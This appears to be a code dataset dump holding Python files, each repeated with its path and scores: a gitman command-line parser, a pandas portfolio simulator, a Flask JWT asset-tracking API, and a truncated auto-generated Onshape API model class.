common.show(exit_message, color='message')
common.newline()
if success:
log.debug("Command succeeded")
else:
log.debug("Command failed")
sys.exit(1)
def _show_error(exception):
# TODO: require level=, evaluate all calls to dedent()
common.dedent(0)
common.newline()
common.show(str(exception), color='error')
common.newline()
if __name__ == '__main__': # pragma: no cover (manual test)
main() | gitman/cli.py | import sys
import argparse
import logging
from . import CLI, VERSION, DESCRIPTION
from . import common, exceptions, commands
log = logging.getLogger(__name__)
def main(args=None, function=None): # pylint: disable=too-many-statements
"""Process command-line arguments and run the program."""
# Shared options
debug = argparse.ArgumentParser(add_help=False)
debug.add_argument('-V', '--version', action='version', version=VERSION)
group = debug.add_mutually_exclusive_group()
group.add_argument('-v', '--verbose', action='count', default=0,
help="enable verbose logging")
group.add_argument('-q', '--quiet', action='store_const', const=-1,
dest='verbose', help="only display errors and prompts")
project = argparse.ArgumentParser(add_help=False)
project.add_argument('-r', '--root', metavar='PATH',
help="root directory of the project")
depth = argparse.ArgumentParser(add_help=False)
depth.add_argument('-d', '--depth', type=common.positive_int,
default=5, metavar="NUM",
help="limit the number of dependency levels")
options = argparse.ArgumentParser(add_help=False)
options.add_argument('-f', '--force', action='store_true',
help="overwrite uncommitted changes in dependencies")
options.add_argument('-c', '--clean', action='store_true',
help="delete ignored files in dependencies")
shared = {'formatter_class': common.WideHelpFormatter}
# Main parser
parser = argparse.ArgumentParser(prog=CLI, description=DESCRIPTION,
parents=[debug], **shared)
subs = parser.add_subparsers(help="", dest='command', metavar="<command>")
# Init parser
info = "create a new config file for the project"
sub = subs.add_parser('init', description=info.capitalize() + '.',
help=info, parents=[debug], **shared)
# Install parser
info = "get the specified versions of all dependencies"
sub = subs.add_parser('install', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth, options],
**shared)
sub.add_argument('name', nargs='*',
help="list of dependencies names to install")
sub.add_argument('-e', '--fetch', action='store_true',
help="always fetch the latest branches")
# Update parser
info = "update dependencies to the latest versions"
sub = subs.add_parser('update', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth, options],
**shared)
sub.add_argument('name', nargs='*',
help="list of dependencies names to update")
sub.add_argument('-a', '--all', action='store_true', dest='recurse',
help="also update all nested dependencies")
sub.add_argument('-L', '--skip-lock',
action='store_false', dest='lock', default=None,
help="disable recording of updated versions")
# List parser
info = "display the current version of each dependency"
sub = subs.add_parser('list', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth], **shared)
sub.add_argument('-D', '--fail-if-dirty', action='store_false',
dest='allow_dirty',
help="fail if a source has uncommitted changes")
# Lock parser
info = "lock the current version of each dependency"
sub = subs.add_parser('lock', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('name', nargs='*',
help="list of dependency names to lock")
# Uninstall parser
info = "delete all installed dependencies"
sub = subs.add_parser('uninstall', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('-f', '--force', action='store_true',
help="delete uncommitted changes in dependencies")
sub.add_argument('-k', '--keep-location', dest='keep_location', default=False,
action='store_true', help="keep top level folder location")
# Show parser
info = "display the path of a dependency or internal file"
sub = subs.add_parser('show', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('name', nargs='*',
help="display the path of this dependency")
sub.add_argument('-c', '--config', action='store_true',
help="display the path of the config file")
sub.add_argument('-l', '--log', action='store_true',
help="display the path of the log file")
# Edit parser
info = "open the config file in the default editor"
sub = subs.add_parser('edit', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
# Parse arguments
namespace = parser.parse_args(args=args)
# Configure logging
common.configure_logging(namespace.verbose)
# Run the program
function, args, kwargs = _get_command(function, namespace)
if function:
_run_command(function, args, kwargs)
else:
parser.print_help()
sys.exit(1)
def _get_command(function, namespace): # pylint: disable=too-many-statements
args = []
kwargs = {}
if namespace.command == 'init':
function = commands.init
elif namespace.command in ['install', 'update']:
function = getattr(commands, namespace.command)
args = namespace.name
kwargs.update(root=namespace.root,
depth=namespace.depth,
force=namespace.force,
clean=namespace.clean)
if namespace.command == 'install':
kwargs.update(fetch=namespace.fetch)
if namespace.command == 'update':
kwargs.update(recurse=namespace.recurse,
lock=namespace.lock)
elif namespace.command == 'list':
function = commands.display
kwargs.update(root=namespace.root,
depth=namespace.depth,
allow_dirty=namespace.allow_dirty)
elif namespace.command == 'lock':
function = getattr(commands, namespace.command)
args = namespace.name
kwargs.update(root=namespace.root)
elif namespace.command == 'uninstall':
function = commands.delete
kwargs.update(root=namespace.root,
force=namespace.force,
keep_location=namespace.keep_location)
elif namespace.command == 'show':
function = commands.show
args = namespace.name
kwargs.update(root=namespace.root)
if namespace.config:
args.append('__config__')
if namespace.log:
args.append('__log__')
elif namespace.command == 'edit':
function = commands.edit
kwargs.update(root=namespace.root)
return function, args, kwargs
def _run_command(function, args, kwargs):
success = False
exit_message = None
try:
log.debug("Running %s command...", getattr(function, '__name__', 'a'))
success = function(*args, **kwargs)
except KeyboardInterrupt:
log.debug("Command canceled")
except exceptions.UncommittedChanges as exception:
_show_error(exception)
exit_message = "Run again with '--force' to discard changes"
except exceptions.ScriptFailure as exception:
_show_error(exception)
exit_message = "Run again with '--force' to ignore script errors"
finally:
if exit_message:
common.show(exit_message, color='message')
common.newline()
if success:
log.debug("Command succeeded")
else:
log.debug("Command failed")
sys.exit(1)
def _show_error(exception):
# TODO: require level=, evaluate all calls to dedent()
common.dedent(0)
common.newline()
common.show(str(exception), color='error')
common.newline()
if __name__ == '__main__': # pragma: no cover (manual test)
main() | 0.389314 | 0.073364 |
import pandas as pd
import numpy as np
def compute_portvals(market, orders, commission=0.00, impact=0.000, start_val=100000):
"""
market : Market_DataFrame returned by actions.get_stock_data
orders : Dataframe of format
{
'date': trading day,
<TICKER>: <ORDER>
}
orders should be indexed by the 'date' column.
where ticker is the stock ticker, and order is the amount to buy (+ number), sell (- number), short (if net orders is negative), and hold (if order is 0)
holding does not need to be specified however.
"""
market = pd.DataFrame(market)
orders.sort_index(inplace=True)
orders = orders.loc[orders.index.isin(market.index)]
symbols = orders.columns
trades = pd.DataFrame(index=market.index,
data=np.zeros((len(market), len(symbols) + 1)),
columns=symbols.tolist() + ['CASH'])
order_on_days = market.loc[orders.index.unique()]
market.loc[:,'CASH'] = np.ones(len(market))
# this function can be vectorized, LOOKING into it
for index, row in order_on_days.iterrows():
# each row is a trading day
execute = orders[orders.index == index]
for _, diff in execute.iterrows():
traded_symbols = diff[~np.isnan(diff)].index # get all stocks which traded on this day
for stock in traded_symbols:
trades.loc[index, stock] += diff[stock]
impact_on_trade = (1 + impact) if diff[stock] > 0 else (1 - impact)
current_cash = trades.loc[index, 'CASH']
if len(symbols) == 1:
trades.loc[index, 'CASH'] = current_cash + (row['close'] * -diff[stock] * impact_on_trade) - (commission)
else:
trades.loc[index, 'CASH'] = current_cash + (row[(stock, 'close')] * -diff[stock] * impact_on_trade) - (commission)
holdings = trades.cumsum()
holdings.loc[:, 'CASH'] += start_val
if len(symbols) == 1:
market = market.drop(columns=['volume']) if 'volume' in market.columns else market
market = market.rename(columns={'close': symbols[0]})
value = holdings * market
else:
closing = market[ [(x, 'close') for x in market.columns.levels[0] ] ].stack()
closing.index = closing.index.droplevel(1)
value = holdings * closing[ [x for x in holdings.columns[:-1]] ]
return value.sum(axis=1) | quantea/marketsim/portvals.py | import pandas as pd
import numpy as np
def compute_portvals(market, orders, commission=0.00, impact=0.000, start_val=100000):
"""
market : Market_DataFrame returned by actions.get_stock_data
orders : Dataframe of format
{
'date': trading day,
<TICKER>: <ORDER>
}
orders should be indexed by the 'date' column.
where ticker is the stock ticker, and order is the amount to buy (+ number), sell (- number), short (if net orders is negative), and hold (if order is 0)
holding does not need to be specified however.
"""
market = pd.DataFrame(market)
orders.sort_index(inplace=True)
orders = orders.loc[orders.index.isin(market.index)]
symbols = orders.columns
trades = pd.DataFrame(index=market.index,
data=np.zeros((len(market), len(symbols) + 1)),
columns=symbols.tolist() + ['CASH'])
order_on_days = market.loc[orders.index.unique()]
market.loc[:,'CASH'] = np.ones(len(market))
# this function can be vectorized, LOOKING into it
for index, row in order_on_days.iterrows():
# each row is a trading day
execute = orders[orders.index == index]
for _, diff in execute.iterrows():
traded_symbols = diff[~np.isnan(diff)].index # get all stocks which traded on this day
for stock in traded_symbols:
trades.loc[index, stock] += diff[stock]
impact_on_trade = (1 + impact) if diff[stock] > 0 else (1 - impact)
current_cash = trades.loc[index, 'CASH']
if len(symbols) == 1:
trades.loc[index, 'CASH'] = current_cash + (row['close'] * -diff[stock] * impact_on_trade) - (commission)
else:
trades.loc[index, 'CASH'] = current_cash + (row[(stock, 'close')] * -diff[stock] * impact_on_trade) - (commission)
holdings = trades.cumsum()
holdings.loc[:, 'CASH'] += start_val
if len(symbols) == 1:
market = market.drop(columns=['volume']) if 'volume' in market.columns else market
market = market.rename(columns={'close': symbols[0]})
value = holdings * market
else:
closing = market[ [(x, 'close') for x in market.columns.levels[0] ] ].stack()
closing.index = closing.index.droplevel(1)
value = holdings * closing[ [x for x in holdings.columns[:-1]] ]
return value.sum(axis=1) | 0.305386 | 0.383064 |
from flask import request, render_template, jsonify
from flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity, get_raw_jwt
from app import app, db, jwt
from app.models import User, Asset
from sqlalchemy.exc import IntegrityError
from assets import stocks, cryptocurrency, fiat, stocks_options, cryptocurrency_options, fiat_options
from utils.sort import process_overview, process_detail
import time
blacklist = set()
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return jti in blacklist
@app.route('/')
def home():
return "Hello world"
@app.route('/api/register', methods=['POST'])
def register():
# data: {
# username: '',
# name: '',
# password: ''
# }
data = request.get_json()
user = User(
name = data['name'],
username = data['username']
)
user.set_password(data['password'])
db.session.add(user)
try:
db.session.commit()
except IntegrityError:
return jsonify(
message="Username already taken"
), 409
new_user = User.query.filter_by(username=data['username']).first()
access_token = create_access_token(identity=data['username'])
return jsonify(
message = "Registration successful!",
id = user.user_id,
token = access_token
)
@app.route('/api/delete_user', methods=['POST'])
@jwt_required
def delete_user():
# data: {
# username: '',
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
if not user.admin:
return jsonify(
message="No access right!"
), 403
data = request.get_json()
user = User.query.filter_by(username=data['username']).first()
db.session.delete(user)
db.session.commit()
return jsonify(
message="User deleted successfully!"
), 200
@app.route('/api/login', methods=['POST'])
def login():
# data: {
# username: '',
# password: ''
# }
data = request.get_json()
if data == None:
return jsonify(
message="No object recieved!"
), 400
user = User.query.filter_by(username=data['username']).first()
if user == None or not user.check_password(data['password']):
return jsonify(message="Username or password incorrect"), 404
else:
access_token = create_access_token(identity=data['username'])
return jsonify(
message = "Login successful!",
id = user.user_id,
token = access_token
)
@app.route('/api/logout', methods=['POST'])
@jwt_required
def logout():
jti = get_raw_jwt()['jti']
blacklist.add(jti)
return jsonify(
message="Logout successful!"
), 200
@app.route('/api/is_authorized', methods=['GET'])
@jwt_required
def is_authorized():
return jsonify(
message="Authorized!"
), 200
@app.route('/api/assets', methods=['GET'])
@jwt_required
def assets():
# assets: {
# stocks: [AAPL, AMD ...],
# cryptocurrency: [BTC, ETH ...],
# fiat: [CHF, USD, EUR ...],
# comodities: [Oil, ],
# metals: [GOLD, Silver, Copper ...]
# }
return {
'assets': {
'Stocks': stocks_options,
'Cryptocurrency': cryptocurrency_options,
'Fiat currency': fiat_options
}
}
@app.route('/api/add_asset', methods=['POST'])
@jwt_required
def add_asset():
# asset: {
# asset_class: Stock,
# asset: AMD,
# quantity: 10
# }
current_user = get_jwt_identity()
user_id = User.query.filter_by(username=current_user).first()
data = request.get_json()
if data['asset_class'] == 'Stocks':
list = stocks
elif data['asset_class'] == 'Cryptocurrency':
list = cryptocurrency
elif data['asset_class'] == 'Fiat currency':
list = fiat
else:
return jsonify(
message="Asset Class not found!"
), 404
if data['asset'] not in list:
return jsonify(
message="Asset not found!"
), 404
#asset will be added regardless if it is already present in database
new_asset = Asset(asset_class=data['asset_class'], asset=data['asset'], quantity=float(data['quantity'].replace(',', '.')), allocator=user_id)
new_asset.set_price()
db.session.add(new_asset)
db.session.commit()
return jsonify(
message="Asset added successfully!"
), 201
@app.route('/api/overview', methods=['GET'])
@jwt_required
def overview():
# holdings: {
# stocks: [
# AMD: [<qty>, <value in USD>],
# AAPL: [<qty>, <value in USD>]
# ],
# crypto: [
# BTC: [<qty>, <value in USD>]
# ]
# fiat: [
# CHF: [<qty>, <value in USD>]
# ]
# },
# stats: {
# net_worth: {
# <value in USD>
# },
# fractions: {
# stocks: [<fraction>, <value in USD>],
# crypto: [<fraction>, <value in USD>],
# fiat: [<fraction>, <value in USD>]
# }
# }
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
data = process_overview(user)
return jsonify(
data=data
), 200
@app.route('/api/detail/<asset>', methods=['GET'])
@jwt_required
def detail(asset): #i.e. asset = AMD
# data: {
# asset_class: '',
# asset: '',
# total_quantity: '',
# total_value: '',
# holdings: [{
# id: <asset ID>
# date: <data bought>,
# price: <price bought at>,
# current_price: <price now>,
# quantity: '',
# gain_percent: <gain in percent>,
# gain: <gain in USD>
# }]
# }
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
data = process_detail(user, asset)
return data
@app.route('/api/edit', methods=['POST'])
@jwt_required
def edit():
#data: {
# id: <asset id>,
# price: <new price bought at>,
# quantity: <new asset quantity>,
# }
data = request.get_json()
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
asset = Asset.query.filter_by(id=data['id']).first()
if asset.user_id != user.user_id or asset == None:
return jsonify(
message="Asset not found!"
), 404
asset.price = data['price']
db.session.commit()
asset.quantity = data['quantity']
db.session.commit()
return jsonify(
message="Update successfull!"
), 200
@app.route('/api/delete_asset/<id>', methods=['GET'])
@jwt_required
def delete(id):
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
asset = Asset.query.filter_by(id=id).first()
if asset.user_id != user.user_id or asset == None:
return jsonify(
message="Asset not found!"
), 404
db.session.delete(asset)
db.session.commit()
return jsonify(
message="Asset deleted successfully!"
), 200 | backend/app/endpoints.py | from flask import request, render_template, jsonify
from flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity, get_raw_jwt
from app import app, db, jwt
from app.models import User, Asset
from sqlalchemy.exc import IntegrityError
from assets import stocks, cryptocurrency, fiat, stocks_options, cryptocurrency_options, fiat_options
from utils.sort import process_overview, process_detail
import time
blacklist = set()
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return jti in blacklist
@app.route('/')
def home():
return "Hello world"
@app.route('/api/register', methods=['POST'])
def register():
# data: {
# username: '',
# name: '',
# password: ''
# }
data = request.get_json()
user = User(
name = data['name'],
username = data['username']
)
user.set_password(data['password'])
db.session.add(user)
try:
db.session.commit()
except IntegrityError:
return jsonify(
message="Username already taken"
), 409
new_user = User.query.filter_by(username=data['username']).first()
access_token = create_access_token(identity=data['username'])
return jsonify(
message = "Registration successful!",
id = user.user_id,
token = access_token
)
@app.route('/api/delete_user', methods=['POST'])
@jwt_required
def delete_user():
# data: {
# username: '',
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
if not user.admin:
return jsonify(
message="No access right!"
), 403
data = request.get_json()
user = User.query.filter_by(username=data['username']).first()
db.session.delete(user)
db.session.commit()
return jsonify(
message="User deleted successfully!"
), 200
@app.route('/api/login', methods=['POST'])
def login():
# data: {
# username: '',
# password: ''
# }
data = request.get_json()
if data == None:
return jsonify(
message="No object recieved!"
), 400
user = User.query.filter_by(username=data['username']).first()
if user == None or not user.check_password(data['password']):
return jsonify(message="Username or password incorrect"), 404
else:
access_token = create_access_token(identity=data['username'])
return jsonify(
message = "Login successful!",
id = user.user_id,
token = access_token
)
@app.route('/api/logout', methods=['POST'])
@jwt_required
def logout():
jti = get_raw_jwt()['jti']
blacklist.add(jti)
return jsonify(
message="Logout successful!"
), 200
@app.route('/api/is_authorized', methods=['GET'])
@jwt_required
def is_authorized():
return jsonify(
message="Authorized!"
), 200
@app.route('/api/assets', methods=['GET'])
@jwt_required
def assets():
# assets: {
# stocks: [AAPL, AMD ...],
# cryptocurrency: [BTC, ETH ...],
# fiat: [CHF, USD, EUR ...],
# comodities: [Oil, ],
# metals: [GOLD, Silver, Copper ...]
# }
return {
'assets': {
'Stocks': stocks_options,
'Cryptocurrency': cryptocurrency_options,
'Fiat currency': fiat_options
}
}
@app.route('/api/add_asset', methods=['POST'])
@jwt_required
def add_asset():
# asset: {
# asset_class: Stock,
# asset: AMD,
# quantity: 10
# }
current_user = get_jwt_identity()
user_id = User.query.filter_by(username=current_user).first()
data = request.get_json()
if data['asset_class'] == 'Stocks':
list = stocks
elif data['asset_class'] == 'Cryptocurrency':
list = cryptocurrency
elif data['asset_class'] == 'Fiat currency':
list = fiat
else:
return jsonify(
message="Asset Class not found!"
), 404
if data['asset'] not in list:
return jsonify(
message="Asset not found!"
), 404
#asset will be added regardless if it is already present in database
new_asset = Asset(asset_class=data['asset_class'], asset=data['asset'], quantity=float(data['quantity'].replace(',', '.')), allocator=user_id)
new_asset.set_price()
db.session.add(new_asset)
db.session.commit()
return jsonify(
message="Asset added successfully!"
), 201
@app.route('/api/overview', methods=['GET'])
@jwt_required
def overview():
# holdings: {
# stocks: [
# AMD: [<qty>, <value in USD>],
# AAPL: [<qty>, <value in USD>]
# ],
# crypto: [
# BTC: [<qty>, <value in USD>]
# ]
# fiat: [
# CHF: [<qty>, <value in USD>]
# ]
# },
# stats: {
# net_worth: {
# <value in USD>
# },
# fractions: {
# stocks: [<fraction>, <value in USD>],
# crypto: [<fraction>, <value in USD>],
# fiat: [<fraction>, <value in USD>]
# }
# }
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
data = process_overview(user)
return jsonify(
data=data
), 200
@app.route('/api/detail/<asset>', methods=['GET'])
@jwt_required
def detail(asset): #i.e. asset = AMD
# data: {
# asset_class: '',
# asset: '',
# total_quantity: '',
# total_value: '',
# holdings: [{
# id: <asset ID>
# date: <data bought>,
# price: <price bought at>,
# current_price: <price now>,
# quantity: '',
# gain_percent: <gain in percent>,
# gain: <gain in USD>
# }]
# }
# }
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
data = process_detail(user, asset)
return data
@app.route('/api/edit', methods=['POST'])
@jwt_required
def edit():
#data: {
# id: <asset id>,
# price: <new price bought at>,
# quantity: <new asset quantity>,
# }
data = request.get_json()
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
asset = Asset.query.filter_by(id=data['id']).first()
if asset.user_id != user.user_id or asset == None:
return jsonify(
message="Asset not found!"
), 404
asset.price = data['price']
db.session.commit()
asset.quantity = data['quantity']
db.session.commit()
return jsonify(
message="Update successfull!"
), 200
@app.route('/api/delete_asset/<id>', methods=['GET'])
@jwt_required
def delete(id):
current_user = get_jwt_identity()
user = User.query.filter_by(username=current_user).first()
asset = Asset.query.filter_by(id=id).first()
if asset.user_id != user.user_id or asset == None:
return jsonify(
message="Asset not found!"
), 404
db.session.delete(asset)
db.session.commit()
return jsonify(
message="Asset deleted successfully!"
), 200 | 0.404743 | 0.074131 |
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_revision_approver_info
except ImportError:
bt_revision_approver_info = sys.modules[
"onshape_client.oas.models.bt_revision_approver_info"
]
try:
from onshape_client.oas.models import bt_user_summary_info
except ImportError:
bt_user_summary_info = sys.modules["onshape_client.oas.models.bt_user_summary_info"]
class BTRevisionInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"approvers": (
[bt_revision_approver_info.BTRevisionApproverInfo],
), # noqa: E501
"auto_obsoletion_release_id": (str,), # noqa: E501
"auto_obsoletion_release_name": (str,), # noqa: E501
"can_current_user_obsolete": (bool,), # noqa: E501
"can_export": (bool,), # noqa: E501
"company_id": (str,), # noqa: E501
"configuration": (str,), # noqa: E501
"document_id": (str,), # noqa: E501
"document_name": (str,), # noqa: E501
"element_id": (str,), # noqa: E501
"element_type": (int,), # noqa: E501
"error_message": (str,), # noqa: E501
"file_name": (str,), # noqa: E501
"flat_part_insertable_id": (str,), # noqa: E501
"href": (str,), # noqa: E501
"id": (str,), # noqa: E501
"insertable_id": (str,), # noqa: E501
"is_obsolete": (bool,), # noqa: E501
"is_translatable": (bool,), # noqa: E501
"mime_type": (str,), # noqa: E501
"name": (str,), # noqa: E501
"next_revision_id": (str,), # noqa: E501
"obsoletion_package_id": (str,), # noqa: E501
"part_id": (str,), # noqa: E501
"part_number": (str,), # noqa: E501
"previous_revision_id": (str,), # noqa: E501
"release_created_date": (datetime,), # noqa: E501
"release_id": (str,), # noqa: E501
"release_name": (str,), # noqa: E501
"released_by": (bt_user_summary_info.BTUserSummaryInfo,), # noqa: E501
"revision": (str,), # noqa: E501
"revision_rule_id": (str,), # noqa: E501
"version_id": (str,), # noqa: E501
"version_name": (str,), # noqa: E501
"view_ref": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"approvers": "approvers", # noqa: E501
"auto_obsoletion_release_id": "autoObsoletionReleaseId", # noqa: E501
"auto_obsoletion_release_name": "autoObsoletionReleaseName", # noqa: E501
"can_current_user_obsolete": "canCurrentUserObsolete", # noqa: E501
"can_export": "canExport", # noqa: E501
"company_id": "companyId", # noqa: E501
"configuration": "configuration", # noqa: E501
"document_id": "documentId", # noqa: E501
"document_name": "documentName", # noqa: E501
"element_id": "elementId", # noqa: E501
"element_type": "elementType", # noqa: E501
"error_message": "errorMessage", # noqa: E501
"file_name": "fileName", # noqa: E501
"flat_part_insertable_id": "flatPartInsertableId", # noqa: E501
"href": "href", # noqa: E501
"id": "id", # noqa: E501
"insertable_id": "insertableId", # noqa: E501
"is_obsolete": "isObsolete", # noqa: E501
"is_translatable": "isTranslatable", # noqa: E501
"mime_type": "mimeType", # noqa: E501
"name": "name", # noqa: E501
"next_revision_id": "nextRevisionId", # noqa: E501
"obsoletion_package_id": "obsoletionPackageId", # noqa: E501
"part_id": "partId", # noqa: E501
"part_number": "partNumber", # noqa: E501
"previous_revision_id": "previousRevisionId", # noqa: E501
"release_created_date": "releaseCreatedDate", # noqa: E501
"release_id": "releaseId", # noqa: E501
"release_name": "releaseName", # noqa: E501
"released_by": "releasedBy", # noqa: E501
"revision": "revision", # noqa: E501
"revision_rule_id": "revisionRuleId", # noqa: E501
"version_id": "versionId", # noqa: E501
"version_name": "versionName", # noqa: E501
"view_ref": "viewRef", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_revision_info.BTRevisionInfo - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
approvers ([bt_revision_approver_info.BTRevisionApproverInfo]): [optional] # noqa: E501
auto_obsoletion_release_id (str): [optional] # noqa: E501
auto_obsoletion_release_name (str): [optional] # noqa: E501
can_current_user_obsolete (bool): [optional] # noqa: E501
can_export (bool): [optional] # noqa: E501
company_id (str): [optional] # noqa: E501
configuration (str): [optional] # noqa: E501
document_id (str): [optional] # noqa: E501
document_name (str): [optional] # noqa: E501
element_id (str): [optional] # noqa: E501
element_type (int): [optional] # noqa: E501
error_message (str): [optional] # noqa: E501
file_name (str): [optional] # noqa: E501
flat_part_insertable_id (str): [optional] # noqa: E501
href (str): [optional] # noqa: E501
id (str): [optional] # noqa: E501
insertable_id (str): [optional] # noqa: E501
is_obsolete (bool): [optional] # noqa: E501
is_translatable (bool): [optional] # noqa: E501
mime_type (str): [optional] # noqa: E501
name (str): [optional] # noqa: E501
next_revision_id (str): [optional] # noqa: E501
obsoletion_package_id (str): [optional] # noqa: E501
part_id (str): [optional] # noqa: E501
part_number (str): [optional] # noqa: E501
previous_revision_id (str): [optional] # noqa: E501
release_created_date (datetime): [optional] # noqa: E501
release_id (str): [optional] # noqa: E501
release_name (str): [optional] # noqa: E501
released_by (bt_user_summary_info.BTUserSummaryInfo): [optional] # noqa: E501
revision (str): [optional] # noqa: E501
revision_rule_id (str): [optional] # noqa: E501
version_id (str): [optional] # noqa: E501
version_name (str): [optional] # noqa: E501
view_ref (str): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value) | python/onshape_client/oas/models/bt_revision_info.py | from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_revision_approver_info
except ImportError:
bt_revision_approver_info = sys.modules[
"onshape_client.oas.models.bt_revision_approver_info"
]
try:
from onshape_client.oas.models import bt_user_summary_info
except ImportError:
bt_user_summary_info = sys.modules["onshape_client.oas.models.bt_user_summary_info"]
class BTRevisionInfo(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"approvers": (
[bt_revision_approver_info.BTRevisionApproverInfo],
), # noqa: E501
"auto_obsoletion_release_id": (str,), # noqa: E501
"auto_obsoletion_release_name": (str,), # noqa: E501
"can_current_user_obsolete": (bool,), # noqa: E501
"can_export": (bool,), # noqa: E501
"company_id": (str,), # noqa: E501
"configuration": (str,), # noqa: E501
"document_id": (str,), # noqa: E501
"document_name": (str,), # noqa: E501
"element_id": (str,), # noqa: E501
"element_type": (int,), # noqa: E501
"error_message": (str,), # noqa: E501
"file_name": (str,), # noqa: E501
"flat_part_insertable_id": (str,), # noqa: E501
"href": (str,), # noqa: E501
"id": (str,), # noqa: E501
"insertable_id": (str,), # noqa: E501
"is_obsolete": (bool,), # noqa: E501
"is_translatable": (bool,), # noqa: E501
"mime_type": (str,), # noqa: E501
"name": (str,), # noqa: E501
"next_revision_id": (str,), # noqa: E501
"obsoletion_package_id": (str,), # noqa: E501
"part_id": (str,), # noqa: E501
"part_number": (str,), # noqa: E501
"previous_revision_id": (str,), # noqa: E501
"release_created_date": (datetime,), # noqa: E501
"release_id": (str,), # noqa: E501
"release_name": (str,), # noqa: E501
"released_by": (bt_user_summary_info.BTUserSummaryInfo,), # noqa: E501
"revision": (str,), # noqa: E501
"revision_rule_id": (str,), # noqa: E501
"version_id": (str,), # noqa: E501
"version_name": (str,), # noqa: E501
"view_ref": (str,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"approvers": "approvers", # noqa: E501
"auto_obsoletion_release_id": "autoObsoletionReleaseId", # noqa: E501
"auto_obsoletion_release_name": "autoObsoletionReleaseName", # noqa: E501
"can_current_user_obsolete": "canCurrentUserObsolete", # noqa: E501
"can_export": "canExport", # noqa: E501
"company_id": "companyId", # noqa: E501
"configuration": "configuration", # noqa: E501
"document_id": "documentId", # noqa: E501
"document_name": "documentName", # noqa: E501
"element_id": "elementId", # noqa: E501
"element_type": "elementType", # noqa: E501
"error_message": "errorMessage", # noqa: E501
